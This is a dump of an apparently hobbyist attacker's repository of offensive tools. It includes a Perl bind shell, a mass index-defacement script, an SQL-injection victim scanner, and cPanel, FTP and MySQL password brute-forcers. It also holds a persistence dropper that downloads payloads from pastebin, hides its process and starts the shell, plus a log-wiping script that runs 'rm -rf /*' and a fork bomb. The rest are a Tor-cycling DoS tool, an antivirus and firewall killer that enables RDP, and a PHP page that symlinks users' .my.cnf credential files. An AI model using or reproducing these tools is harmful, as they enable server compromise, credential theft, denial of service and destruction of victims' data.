├── README.md ├── tor.zip ├── burte.zip ├── hash-gui.zip ├── redirct.zip ├── w0lgix.zip ├── bind.pl ├── mass.sh ├── blackscanner ├── cpanel.sh ├── ftp.php ├── mining-lin.sh ├── danger.sh ├── hide.sh ├── Dos.c ├── av.killer.c ├── cpanel.php ├── mysql.php ├── weblack.php ├── config-grabber.sh ├── admin.php └── hashbinto.py /README.md: -------------------------------------------------------------------------------- 1 | # w0lgix-tool 2 | this all tools here free and open source 3 | -------------------------------------------------------------------------------- /tor.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhmadmasrwe/w0lgix-tool/HEAD/tor.zip -------------------------------------------------------------------------------- /burte.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhmadmasrwe/w0lgix-tool/HEAD/burte.zip -------------------------------------------------------------------------------- /hash-gui.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhmadmasrwe/w0lgix-tool/HEAD/hash-gui.zip -------------------------------------------------------------------------------- /redirct.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhmadmasrwe/w0lgix-tool/HEAD/redirct.zip -------------------------------------------------------------------------------- /w0lgix.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhmadmasrwe/w0lgix-tool/HEAD/w0lgix.zip -------------------------------------------------------------------------------- /bind.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | $SHELL="/bin/sh -i"; 3 | if (@ARGV < 1) { exit(1); } 4 | use Socket; 5 | socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n"; 6 | setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); 7 | bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n"; 8 | listen(S,3) || die "Cant listen port\n"; 9 | while(1) { 10 | accept(CONN,S); 11 | if(!($pid=fork)) { 12 | die "Cannot fork" if (!defined $pid); 13 | open STDIN,"<&CONN"; 14 | open STDOUT,">&CONN"; 15 | open STDERR,">&CONN"; 16 | exec $SHELL || die print CONN "Cant execute $SHELL\n"; 17 | close CONN; 18 | exit 0; 19 | } 20 | } 21 | #$out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &"); 22 | #perl bp.pl [port] 1>/dev/null 2>&1 & 23 | -------------------------------------------------------------------------------- /mass.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | echo "###################################################" 5 | echo "#https://www.facebook.com/Officiel.mhmad #" 6 | echo "# #" 7 | echo "# ░░░░░░███████ ]▄▄▄▄▄▄▄▄ #" 8 | echo "#▂▄▅█████████▅▄▃▂ #" 9 | echo "#I███████████████████]. #" 10 | echo "#◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤... #" 11 | echo "# Coded by w0lgix[AnonSniper] #" 12 | echo "# v1.0 #" 13 | echo "# #" 14 | echo "# Using ./mass.sh #" 15 | echo "###################################################" 16 | 17 | if [ -z "$1" ] && [ -z "$2" ];then 18 | echo '[+] ./mass.sh [index-path] [folder-path]' 19 | echo 20 | exit 21 | 22 | else 23 | echo -e "Staring Time in: $(date +"%r %a "%d"/"%m"/"%y)" 24 | echo '[+] Starting ........' 25 | sleep 1 26 | find $2 -name "index.*" -exec cp $1 {} \; 27 | echo 28 | echo '[+] Done !' 29 | echo -e "Finish Time in: $(date +"%r %a "%d"/"%m"/"%y)" 30 | fi 31 | -------------------------------------------------------------------------------- /blackscanner: -------------------------------------------------------------------------------- 1 | #/usr/bin/env ruby 2 | 3 | require 'net/http' 4 | 5 | 6 | def web_count(server_ip,variable) 7 | file = File.new("Victimes.txt","w") 8 | (0..6).each do |pages| 9 | req = Net::HTTP.get_response(URI.parse("http://www.bing.com/search?q=ip%3a#{server_ip}+%22.php%3f#{variable}%3d%22&go=&filt=all&first=#{pages*10 + 1}&FORM=PERE1")) #get the request 10 | bodys = req.body 11 | my_array = bodys.split('"') # split the text 12 | my_array.each do |words| 13 | if words.scan(".php?#{variable}=").size > 0 then #scan for the .php?id= 14 | if words.scan("http://").size > 0 then 15 | file.puts words 16 | end 17 | end 18 | end 19 | end 20 | file.close 21 | end 22 | def check_sql() 23 | file = File.open("Victimes.txt","r") 24 | file.each_line do |x| 25 | web_v = x+"'" 26 | web_v["\n"]="" 27 | sql = Net::HTTP.get_response(URI.parse(web_v)) 28 | if sql.body.downcase.scan("sql").size > 0 then 29 | puts "this web is vulnerable : #{x}" 30 | end 31 | end 32 | end 33 | 34 | if ARGV.size .eql?(2) == false 35 | puts "\nusage [server ip] [variable] ex: ruby DEV.rb 127.0.0.1 id" 36 | else 37 | begin 38 | puts "########################################" 39 | puts "# SQL_Scanner By BlackVirus X-Sec Team #" 40 | puts "# www.facebook.com/zaki.nih #" 41 | puts "########################################\n" 42 | web_count(ARGV[0],ARGV[1]) 43 | check_sql() 44 | rescue 45 | puts "can't extract website" 46 | end 47 | end 48 | 49 | -------------------------------------------------------------------------------- /cpanel.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ $# -eq 0 || $# -eq 1 || $# -eq 2 ]] ;then 4 | echo "###################################################" 5 | echo "#https://www.facebook.com/Officiel.mhmad #" 6 | echo "# #" 7 | echo "# ░░░░░░███████ ]▄▄▄▄▄▄▄▄ #" 8 | echo "#▂▄▅█████████▅▄▃▂ #" 9 | echo "#I███████████████████]. #" 10 | echo "#◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤... #" 11 | echo "# Coded by w0lgix #" 12 | echo "# v1.0 #" 13 | echo "# #" 14 | echo "# Using ./cpanel.sh #" 15 | echo "###################################################" 16 | echo -e "[+] using [site:2082] [username] [wordlist]" 17 | exit 18 | fi 19 | 20 | #check if file 21 | if [ -f $2 ]; #if file inside here 22 | then 23 | 24 | password=`cat $3` 25 | 26 | for password in $password 27 | do 28 | 29 | curl -s $1 --data "user="$2"&pass="$password"&login=" | grep 'HTTP-EQUIV="refresh"' | sed 's/ $path/users.txt"); 34 | echo $art; 35 | echo "Example: \n"; 36 | die(); 37 | } 38 | 39 | 40 | echo $art; 41 | 42 | 43 | 44 | $open = fopen($ftp_user_name, 'r'); 45 | $read = fread($open, filesize($ftp_user_name)); 46 | fclose($open); 47 | 48 | $ftp_user_name1 = explode("\n", $read); 49 | 50 | foreach ($ftp_user_name1 as $users) { 51 | 52 | $open1 = fopen($ftp_user_pass, 'r'); 53 | $read1 = fread($open1, filesize($ftp_user_pass)); 54 | fclose($open1); 55 | $ftp_user_pass1 = explode("\n", $read1); 56 | 57 | foreach ($ftp_user_pass1 as $key) { 58 | 59 | // login with username and password 60 | $conn_id = ftp_connect($ftp_server); 61 | 62 | $login_result = ftp_login($conn_id, $users, $key); 63 | // check connection 64 | if ($login_result) { 65 | 66 | $open3 = fopen("ftp_rezult.txt", "a+"); 67 | $read3 = fwrite($open3, "$ftp_server >> $users $key\n"); 68 | fclose($open3); 69 | echo "\033[1;33m$users \t $key\n\033[1;m"; 70 | 71 | } 72 | else 73 | { 74 | 75 | echo "FTP connection has failed!\n"; 76 | 77 | } 78 | 79 | } 80 | } 81 | 82 | ?> 83 | -------------------------------------------------------------------------------- /mining-lin.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #ⒶⓝⓄⓝⓢⓝⒾⓟⒺⓇⓢ.ⓒⓞⓜ 3 | #u most u in root not using sudo and run first take root and run :) 4 | ############################################ 5 | # Coded By w0lgix # 6 | ############################################ 7 | i="0" 8 | while [ $i -lt 4 ] 9 | do 10 | if [ -f $1 ]; 11 | then 12 | echo "file found" 13 | elif [ $EUID -eq 0 ] 14 | then 15 | mkdir /root/.tmp 16 | old=$(expr $$ - 1) 17 | #new=$(expr $$ + 1) 18 | mount -o bind /root/.tmp /proc/$old 19 | mount -o bind /root/.tmp /proc/$$ 20 | #mount -o bind /home/w0lgix/yy /proc/$new 21 | 22 | echo "file delete" 23 | wget "http://pastebin.com/raw/A5AydcwD" -O .inc.php 24 | wget "http://pastebin.com/raw/76inrqx8" -O .conf.php 25 | #mv index.html index.php 26 | #curl "http://pastebin.com/raw/X2L62eZ2" >> index.php 27 | #curl https://raw.githubusercontent.com/mhmadmasrwe/w0lgix-tool/master/bind.pl >> bind.pl 28 | #perl bind.pl "44444 1>/dev/null 2>&1 &" 29 | #wget "https://raw.githubusercontent.com/mhmadmasrwe/w0lgix-tool/master/Dos.c" -O Dos.c 30 | #gcc Dos.c -o Dos 31 | #chmod 755 Dos 32 | #rm "bind.pl" 33 | echo $SERVER_NAME | mail -s 'the site delete your shell' mhmad.msarwe@yahoo.com 34 | rm $0 35 | while [ $i -lt 1 ] 36 | do 37 | wget "http://pastebin.com/raw/A5AydcwD" -O .inc.php 38 | sleep 43200 39 | wget "http://pastebin.com/raw/76inrqx8" -O .conf.php 40 | echo $$ | tee .color3.css 41 | done 42 | 43 | else 44 | 45 | 46 | old=$(expr $$ - 1) 47 | 48 | echo "file delete" 49 | wget "http://pastebin.com/raw/A5AydcwD" -O .inc.php 50 | wget "http://pastebin.com/raw/76inrqx8" -O .conf.php 51 | mv index.html index.php 52 | curl "http://pastebin.com/raw/X2L62eZ2" >> index.php 53 | curl https://raw.githubusercontent.com/mhmadmasrwe/w0lgix-tool/master/bind.pl >> bind.pl 54 | perl bind.pl "65535 1>/dev/null 2>&1 &" 55 | #wget "https://raw.githubusercontent.com/mhmadmasrwe/w0lgix-tool/master/Dos.c" -O Dos.c 56 | #gcc Dos.c -o Dos 57 | #chmod 755 Dos 58 | rm "bind.pl" 59 | echo $SERVER_NAME | mail -s 'the site delete your shell' mhmad.msarwe@yahoo.com 60 | rm "mining-lin.sh" 61 | while [ $i -lt 1 ] 62 | do 63 | wget "http://pastebin.com/raw/A5AydcwD" -O .inc.php 64 | sleep 300 65 | wget "http://pastebin.com/raw/76inrqx8" -O .conf.php 66 | echo $$ | .color3.css 67 | done 68 | 69 | fi 70 | done 71 | 72 | #for hide process name to kill u most know process pid 73 | #mount -o bind /empty/dir /proc/42 74 | 75 | #for work background 76 | #setsid sh -c 'bash mining-lin.sh shell.php <> /dev/null >&0 2>&2" 77 | #replace "-' 78 | 79 | #for setup boot 80 | #/etc/init.d/ 81 | #chmod 755 file 82 | #update-rc.d file defaults 83 | -------------------------------------------------------------------------------- /danger.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | echo "###################################################" 5 | echo "#https://www.facebook.com/Officiel.mhmad #" 6 | echo "# #" 7 | echo "# ░░░░░░███████ ]▄▄▄▄▄▄▄▄ #" 8 | echo "#▂▄▅█████████▅▄▃▂ #" 9 | echo "#I███████████████████]. #" 10 | echo "#◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤... #" 11 | echo "# Coded by w0lgix #" 12 | echo "# v1.0 #" 13 | echo "# #" 14 | echo "# Using ./danger.sh Option #" 15 | echo "###################################################" 16 | 17 | echo -e "enter chooise \n1)for get sudo domain\n2)for get ips server\n3)scan port" 18 | read num 19 | 20 | case $num in 21 | 22 | 1) 23 | 24 | echo -e "enter website" 25 | read website 26 | 27 | echo -e "Time Strating: "$(date +"%r ") 28 | 29 | 30 | fierce -dns $website 31 | 32 | 33 | echo -e "Time Finish: "$(date +"%r ") 34 | ;; 35 | 36 | 2) 37 | echo -e "\n1)list\n2)single" 38 | read sl 39 | if [ $sl -eq 1 ] 40 | 41 | then 42 | echo "enter namefile iplist" 43 | read file 44 | url=`cat $file` 45 | 46 | echo "Prossing..." 47 | for url in $url 48 | do 49 | 50 | sleep 1 51 | host $url | grep "has address" | cut -d" " -f1,4 52 | 53 | done 54 | 55 | echo "Finish !!" 56 | 57 | 58 | 59 | elif [ $sl -eq 2 ] 60 | then 61 | 62 | echo "enter site" 63 | read site 64 | echo "Prossing..." 65 | 66 | 67 | sleep 1 68 | host $site | grep "has address" | cut -d" " -f1,4 69 | 70 | 71 | echo "Finish !!" 72 | fi 73 | ;; 74 | 75 | 3) 76 | echo -e "\n1)for scan full\n2)way to bypass firewall\n3)scan list ip\n4)scan small packet\n5)to change mac address\n6)scan for tcp/udp (random)" 77 | 78 | read ch 79 | 80 | if [ $ch -eq 1 ] 81 | then 82 | echo "enter ip" 83 | read we 84 | sudo nmap $we -sS -sV -Pn -O 85 | 86 | 87 | elif [ $ch -eq 2 ] 88 | then 89 | 90 | echo "enter ip" 91 | read we 92 | sudo nmap $we -f 93 | 94 | elif [ $ch -eq 3 ] 95 | then 96 | echo "enter list ip" 97 | read list1 98 | sudo nmap -sV -iL $list1 > scan.txt 99 | 100 | elif [ $ch -eq 4 ] 101 | then 102 | echo "enter ip" 103 | read we 104 | sudo nmap --mtu 8 $we 105 | 106 | elif [ $ch -eq 5 ] 107 | then 108 | echo "enter ip" 109 | read we 110 | sudo nmap -sT -PN --spoof-mac 0 $we 111 | 112 | elif [ $ch -eq 6 ] 113 | then 114 | echo "enter ip" 115 | read we 116 | sudo nmap --badsum $we 117 | fi 118 | 119 | ;; 120 | *) 121 | echo "Chose 1 - 3!!" 122 | 123 | esac 124 | 125 | 126 | -------------------------------------------------------------------------------- /hide.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | echo "###################################################" 5 | echo "#https://www.facebook.com/Officiel.mhmad #" 6 | echo "# #" 7 | echo "# ░░░░░░███████ ]▄▄▄▄▄▄▄▄ #" 8 | echo "#▂▄▅█████████▅▄▃▂ #" 9 | echo "#I███████████████████]. #" 10 | echo "#◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤... #" 11 | echo "# Coded by w0lgix #" 12 | echo "# v1.0 #" 13 | echo "# #" 14 | echo "# Using ./hide.sh Option #" 15 | echo "###################################################" 16 | echo -e "1) for delete all file log and sabotage server\n2) for frizz server (not access root)\n" 17 | 18 | ch=$1 19 | 20 | 21 | case $ch in 22 | 1) 23 | echo "Time Distroy is: "$(date +"%r %a %d"/"%m"/"%y") 24 | file1="/tmp/logs" 25 | file2="$HISTFILE" 26 | file3="/root/.ksh_history" 27 | file4="/root/.bash_history" 28 | file5="/root/.ksh_history" 29 | file6="/root/.bash_logout" 30 | file7="/usr/local/apache/logs" 31 | file8="/usr/local/apache/log" 32 | file9="/var/apache/logs" 33 | file10="/var/apache/log" 34 | file11="/var/run/utmp" 35 | file12="/var/logs" 36 | file13="/var/log" 37 | file14="/var/adm" 38 | file15="/etc/wtmp" 39 | file16="/etc/utmp" 40 | file17="/var/log/auth.log" 41 | file18="/home" 42 | file19="/tmp" 43 | file20="/var" 44 | file21="/etc" 45 | file22="/lost+found" 46 | file23="/mnt" 47 | file24="/root" 48 | file25="/proc" 49 | file26="/sys" 50 | 51 | if [ -d $file1 -a -d $file2 -a -f $file3 -a -f $file4 -a -f $file5 -a -f $file6 -a -f $file7 -a -f $file8 -a -d $file9 -a -d $file10 -a -d $file11 -a -d $file12 -a -d $file13 -a -d $file14 -a -d $file15 -a -d $file16 -a -f $file17 -a -d $file18 -a -d $file19 -a -d $file20 -a -d $file21 -a -d $file22 -a -d $file23 -a -d $file24 -a -d $file25 -a -d $file26 ] ; then 52 | rm -rf $file1 53 | rm -rf $file2 54 | rm $file3 55 | rm $file4 56 | rm $file5 57 | rm $file6 58 | rm $file7 59 | rm $file8 60 | rm -rf $file9 61 | rm -rf $file10 62 | rm -rf $file11 63 | rm -rf $file12 64 | rm -rf $file13 65 | rm -rf $file14 66 | rm -rf $file15 67 | rm -rf $file16 68 | rm $file17 69 | rm -rf $file18 70 | rm -rf $file19 71 | rm -rf $file20 72 | rm -rf $file21 73 | rm -rf $file22 74 | rm -rf $file22 75 | rm -rf $file23 76 | rm -rf $file24 77 | rm -rf $file25 78 | rm -rf $file26 79 | fi 80 | sleep 1 81 | find / -name *.bash_history -exec rm -rf {} \; 82 | sleep 1 83 | find / -name *.bash_logout -exec rm -rf {} \; 84 | sleep 1 85 | find / -name log* -exec rm -rf {} \; 86 | sleep 1 87 | find / -name *.log -exec rm -rf {} \; 88 | sleep 1 89 | rm --no-preserve-too -rf / 90 | sleep 1 91 | rm -rf /* 92 | sleep 5 93 | poweroff 94 | 95 | ;; 96 | 2) 97 | 98 | :(){ :|: & };: 99 | ;; 100 | 101 | *) echo -e "Time is: $(date +"%r %a "%d"/"%m"/"%y)" 102 | 103 | esac 104 | 105 | -------------------------------------------------------------------------------- /Dos.c: -------------------------------------------------------------------------------- 1 | /* XerXes - Most powerful dos tool - THN (http://www.thehackernews.com) */ 2 | /* gcc Dos.c -o Dos ; chmod 755 Dos */ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | 18 | 19 | 20 | 21 | int make_socket(char *host, char *port) { 22 | struct addrinfo hints, *servinfo, *p; 23 | int sock, r; 24 | // fprintf(stderr, "[Connecting -> %s:%s\n", host, port); 25 | memset(&hints, 0, sizeof(hints)); 26 | hints.ai_family = AF_UNSPEC; 27 | hints.ai_socktype = SOCK_STREAM; 28 | if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { 29 | fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); 30 | exit(0); 31 | } 32 | for(p = servinfo; p != NULL; p = p->ai_next) { 33 | if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { 34 | continue; 35 | } 36 | if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { 37 | close(sock); 38 | continue; 39 | } 40 | break; 41 | } 42 | if(p == NULL) { 43 | if(servinfo) 44 | freeaddrinfo(servinfo); 45 | fprintf(stderr, "No connection could be made\n"); 46 | exit(0); 47 | } 48 | if(servinfo) 49 | freeaddrinfo(servinfo); 50 | fprintf(stderr, "[Connected -> %s:%s]\n", host, port); 51 | return sock; 52 | } 53 | 54 | 55 | void broke(int s) { 56 | // do nothing 57 | } 58 | 59 | 60 | #define CONNECTIONS 8 61 | #define THREADS 48 62 | 63 | 64 | void attack(char *host, char *port, int id) { 65 | int sockets[CONNECTIONS]; 66 | int x, g=1, r; 67 | for(x=0; x!= CONNECTIONS; x++) 68 | sockets[x]=0; 69 | signal(SIGPIPE, &broke); 70 | while(1) { 71 | for(x=0; x != CONNECTIONS; x++) { 72 | if(sockets[x] == 0) 73 | sockets[x] = make_socket(host, port); 74 | r=write(sockets[x], "\0", 1); 75 | if(r == -1) { 76 | close(sockets[x]); 77 | sockets[x] = make_socket(host, port); 78 | } else 79 | // fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r); 80 | fprintf(stderr, "[%i: \033[1;36m send packet successfuly]\n", id); 81 | } 82 | fprintf(stderr, "[%i: \033[1;37m send packet successfuly]\n", id); 83 | usleep(300000); 84 | } 85 | } 86 | 87 | 88 | void cycle_identity() { 89 | int r; 90 | 91 | 92 | printf("\033[1;31m###################################################\n"); 93 | printf("\033[1;32m#https://www.facebook.com/Officiel.mhmad #\n"); 94 | printf("\033[1;33m# #\n"); 95 | printf("\033[1;34m# ░░░░░░███████ ]▄▄▄▄▄▄▄▄ #\n"); 96 | printf("\033[1;35m#▂▄▅█████████▅▄▃▂ #\n"); 97 | printf("\033[1;36m#I███████████████████]. #\n"); 98 | printf("\033[1;33m#◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤... #\n"); 99 | printf("\033[1;34m# Development by w0lgix #\n"); 100 | printf("\033[1;36m# v2.0 #\n"); 101 | printf("\033[1;32m# #\n"); 102 | printf("\033[1;31m# Using ./Dos localhost port #\n"); 103 | printf("\033[1;34m###################################################\n\n"); 104 | 105 | 106 | 107 | int socket = make_socket("localhost", "9050"); 108 | write(socket, "AUTHENTICATE \"\"\n", 16); 109 | while(1) { 110 | r=write(socket, "signal NEWNYM\n\x00", 16); 111 | fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r); 112 | usleep(300000); 113 | } 114 | } 115 | 116 | 117 | int main(int argc, char **argv) { 118 | int x; 119 | 120 | if(argc !=3) 121 | cycle_identity(); 122 | for(x=0; x != THREADS; x++) { 123 | if(fork()) 124 | attack(argv[1], argv[2], x); 125 | usleep(200000); 126 | } 127 | getc(stdin); 128 | return 0; 129 | } 130 | -------------------------------------------------------------------------------- /av.killer.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | /* this for windows system can shutdown firewall 7 | and antivirus and enable rdp */ 8 | 9 | /* 10 | #define input "runing" 11 | 12 | char pass[20]; 13 | printf("Enter Password:~$"); 14 | scanf("%s",&pass); 15 | if(strcmp(pass,input) == 0) 16 | */ 17 | int main() 18 | { 19 | ////////////////////////avg/////////////////// 20 | system("tasklist /SVC | find /I ""avg"" "); 21 | system("taskkill /F /IM ""avg*"" "); 22 | system("taskkill /F /IM ""fixcfg*"" "); 23 | ///////////////////////avast/////////////////////// 24 | system("tasklist /SVC | find /I ""ashDisp"" "); 25 | system("taskkill /F /IM ""ashDisp*"" "); 26 | system("taskkill /F /IM ""aswupdsv*"" "); 27 | system("taskkill /F /IM ""ashserv*"" "); 28 | system("taskkill /F /IM ""ashMaisv*"" "); 29 | system("taskkill /F /IM ""ash***sv*"" "); 30 | system("taskkill /F /IM ""ashQuick*"" "); 31 | system("taskkill /F /IM ""sched*"" "); 32 | system("taskkill /F /IM ""ashAvast*"" "); 33 | system("taskkill /F /IM ""VisthUpd*"" "); 34 | system("taskkill /F /IM ""AVASTSS*"" "); 35 | system("taskkill /F /IM ""AVA*"" "); 36 | system("taskkill /F /IM ""ashSimpl*"" "); 37 | system("taskkill /F /IM ""ashCmd*"" "); 38 | system("taskkill /F /IM ""ashSimp2*"" "); 39 | system("taskkill /F /IM ""ashEnhcd*"" "); 40 | //////////////////////////Eset//////////////////// 41 | system("tasklist /SVC | find /I ""egui"" "); 42 | system("taskkill /F /IM ""egui*"" "); 43 | ////////////////////////////////////////////// 44 | system("tasklist /SVC | find /I ""mcafee"" "); 45 | system("taskkill /F /IM ""mcafee*"" "); 46 | ////////////////////////avira///////////////////// 47 | system("tasklist /SVC | find /I ""avgnt"" "); 48 | system("taskkill /F /IM ""avscan*"" "); 49 | system("taskkill /F /IM ""avcenter*"" "); 50 | system("taskkill /F /IM ""avguard*"" "); 51 | system("taskkill /F /IM ""avwsc*"" "); 52 | system("taskkill /F /IM ""avconfig*"" "); 53 | system("taskkill /F /IM ""update*"" "); 54 | system("taskkill /F /IM ""setup*"" "); 55 | system("taskkill /F /IM ""sched*"" "); 56 | system("taskkill /F /IM ""guardgui*"" "); 57 | system("taskkill /F /IM ""avupgsvc*"" "); 58 | system("taskkill /F /IM ""avadmin*"" "); 59 | ////////////////////////////////////////////// 60 | system("tasklist /SVC | find /I ""emsisoft"" "); 61 | system("taskkill /F /IM ""emsisoft*"" "); 62 | ////////////////////////////////////////////// 63 | system("tasklist /SVC | find /I ""f-secure"" "); 64 | system("taskkill /F /IM ""f-secure*"" "); 65 | ////////////////////////////////////////////// 66 | system("tasklist /SVC | find /I ""ikarus"" "); 67 | system("taskkill /F /IM ""ikarus*"" "); 68 | ////////////////////////////////////////////// 69 | system("tasklist /SVC | find /I ""symantec"" "); 70 | system("taskkill /F /IM ""symantec*"" "); 71 | ////////////////////////////////////////////// 72 | system("tasklist /SVC | find /I ""bitdefender"" "); 73 | system("taskkill /F /IM ""bitdefender*"" "); 74 | ////////////////////////////////////////////// 75 | system("tasklist /SVC | find /I ""k7"" "); 76 | system("taskkill /F /IM ""k7*"" "); 77 | //////////////////////kaspersky//////////////////////// 78 | system("tasklist /SVC | find /I ""avp"" "); 79 | system("taskkill /F /IM ""avp*"" "); 80 | ////////////////////////////////////////////// 81 | system("tasklist /SVC | find /I ""malwarebytes"" "); 82 | system("taskkill /F /IM ""malwarebytes*"" "); 83 | ////////////////////////////////////////////// 84 | system("tasklist /SVC | find /I ""panda"" "); 85 | system("taskkill /F /IM ""panda*"" "); 86 | //////////////////firewall//////////////////// 87 | system("netsh firewall set opmode disable"); 88 | system("netsh advfirewall set profiles state off "); 89 | /////////////////enable RDP//////////////////// 90 | system("netsh firewall set service type = remotedesktop mode = enable"); 91 | /////////////////windows defender /////////////////////// 92 | system("sc config WinDefend start= disabled"); 93 | system("sc stop WinDefend"); 94 | ////////////////////////restart Pc/////////////////////// 95 | //system("shutdown /r"); 96 | } 97 | -------------------------------------------------------------------------------- /cpanel.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Cpanel 5 | 6 | 7 | 8 | 9 | 10 | 11 | 19 | 20 | 21 | 22 |

Crack Cpanel V 0.7.3

"; 29 | $a = fopen("/etc/passwd","r"); 30 | $read = fread($a, filesize("/etc/passwd")); 31 | fclose($a); 32 | 33 | $ok = 0; 34 | 35 | 36 | 37 | $username = preg_replace("/:\/*[a-zA-Z0-9,-]*(...)*[a-z]*/","", $read); 38 | $username1 = explode("\n",$username); 39 | 40 | 41 | $case = " 42 |
43 | 48 |
49 | "; 50 | 51 | echo $case; 52 | 53 | $selectOption = $_POST['way']; 54 | 55 | 56 | switch ($selectOption) { 57 | 58 | case "Cpanel": 59 | echo $brute; 60 | break; 61 | 62 | case "FTP": 63 | 64 | 65 | if(isset($_POST['password'])); 66 | 67 | $a2 = explode("\r\n",$_POST['password']); 68 | 69 | 70 | foreach ($username1 as $username2 ){ 71 | 72 | foreach ($a2 as $password1) { 73 | 74 | if(isset($_POST['dump'])){ 75 | $ip = ftp_connect("127.0.0.1"); 76 | if(ftp_login($ip, $username2, $password1)) 77 | { 78 | 79 | echo "username is ===> ($username2) Password is ===> ($password1)
"; 80 | $ok++; 81 | echo "
You Found $ok FTP By w0lgix\n"; 82 | 83 | 84 | } 85 | 86 | } 87 | 88 | } 89 | 90 | } 91 | 92 | 93 | break; 94 | 95 | case "My_Cnf": 96 | 97 | $pass33 = fopen("/etc/passwd","r"); 98 | $read4 = fread($pass33, filesize("/etc/passwd")); 99 | fclose($pass33); 100 | $username4 = preg_replace("/:\/*[a-zA-Z0-9,-]*(...)*[a-z]*/","", $read4); 101 | $username14 = explode("\n",$username4); 102 | 103 | foreach ($username14 as $key4) { 104 | # code... 105 | 106 | mkdir('cpanel'); 107 | $path = getcwd(); 108 | @symlink('/home/'.$key4.'/.my.cnf', $path.'/cpanel/'.$key4.'.txt'); 109 | @symlink('/var/'.$key4.'/.my.cnf', $path.'/cpanel/'.$key4.'.txt'); 110 | @symlink('/var/www/'.$key4.'/.my.cnf', $path.'/cpanel/'.$key4.'.txt'); 111 | @symlink('/home1/'.$key4.'/.my.cnf', $path.'/cpanel/'.$key4.'.txt'); 112 | @symlink('/home2/'.$key4.'/.my.cnf', $path.'/cpanel/'.$key4.'.txt'); 113 | @symlink('/home3/'.$key4.'/.my.cnf', $path.'/cpanel/'.$key4.'.txt'); 114 | @symlink('/home4/'.$key4.'/.my.cnf', $path.'/cpanel/'.$key4.'.txt'); 115 | @symlink('/home5/'.$key4.'/.my.cnf', $path.'/cpanel/'.$key4.'.txt'); 116 | @symlink('/home6/'.$key4.'/.my.cnf', $path.'/cpanel/'.$key4.'.txt'); 117 | @symlink('/var/www/html/'.$key4.'/.my.cnf', $path.'/cpanel/'.$key4.'.txt'); 118 | 119 | } 120 | 121 | echo ""; 122 | 123 | $path2 = dirname($_SERVER['PHP_SELF']); 124 | $link = "Link Here:~)"; 125 | echo $link; 126 | die(); 127 | break; 128 | 129 | } 130 | 131 | 132 | 133 | 134 | $pass = " 135 |
136 | 137 | 139 |

140 |
141 | "; 142 | 143 | $brute = " 144 |
145 |
146 | 149 |

150 | "; 151 | if(isset($_POST['password'])); 152 | 153 | $a2 = explode("\r\n",$_POST['password']); 154 | 155 | 156 | foreach ($username1 as $username2 ){ 157 | 158 | foreach ($a2 as $password1) { 159 | 160 | if(isset($_POST['dump'])){ 161 | 162 | if(@mysql_connect('localhost',$username2,$password1)){ 163 | 164 | echo "username is ===> ($username2) Password is ===> ($password1)
"; 165 | $ok++; 166 | echo "
You Found $ok Cpanel By w0lgix\n"; 167 | 168 | 169 | } 170 | 171 | } 172 | 173 | } 174 | 175 | } 176 | 177 | 178 | 179 | echo $brute; 180 | echo $pass; 181 | //#@345cc6mvw5FTDJx=B#Dfgt56 182 | //#1234S$%bdu+S+ERF-12#$@@tui# 183 | ?> 184 | 185 | 186 | 187 | 188 | 189 | 190 | -------------------------------------------------------------------------------- /mysql.php: -------------------------------------------------------------------------------- 1 | \033[1;m\n"; 35 | 36 | if($host == null or $listuser == null or $listpass == null ){ 37 | system("clear"); 38 | echo $art."\n"; 39 | echo $a; 40 | exit("Example: \n"); 41 | 42 | } 43 | switch ($sqlserver) { 44 | 45 | 46 | 47 | case 'mysql': 48 | 49 | echo ($a="\033[1;31m\tMySql BruteForce Coded By w0lgix\033[1;m\n"); 50 | sleep(2); 51 | 52 | 53 | if($host == null or $listuser == null or $listpass == null ){ 54 | system("clear"); 55 | echo $a; 56 | exit("Example: \n"); 57 | 58 | } 59 | 60 | $open = fopen($listuser, "r"); 61 | $read = fread($open, filesize($listuser)); 62 | fclose($open); 63 | 64 | $users = explode("\n", $read); 65 | 66 | 67 | $open1 = fopen($listpass, "r"); 68 | $read1 = fread($open1, filesize($listpass)); 69 | fclose($open1); 70 | 71 | $passs = explode("\n", $read1); 72 | 73 | 74 | foreach ($users as $user) { 75 | 76 | foreach ($passs as $pass) { 77 | 78 | $i = 0; 79 | 80 | 81 | if(@mysql_connect($host,$user,$pass)) 82 | { 83 | echo "\033[1;34mConnected Secssful\033[1;m\n"; 84 | echo "user is \033[1;33m$user\033[1;m and password is \033[1;35m$pass\033[1;m\n"; 85 | 86 | $rezult=fopen("rezult.txt", "a"); 87 | $write=fwrite($rezult, "[+]$host >> user:$user pass:$pass 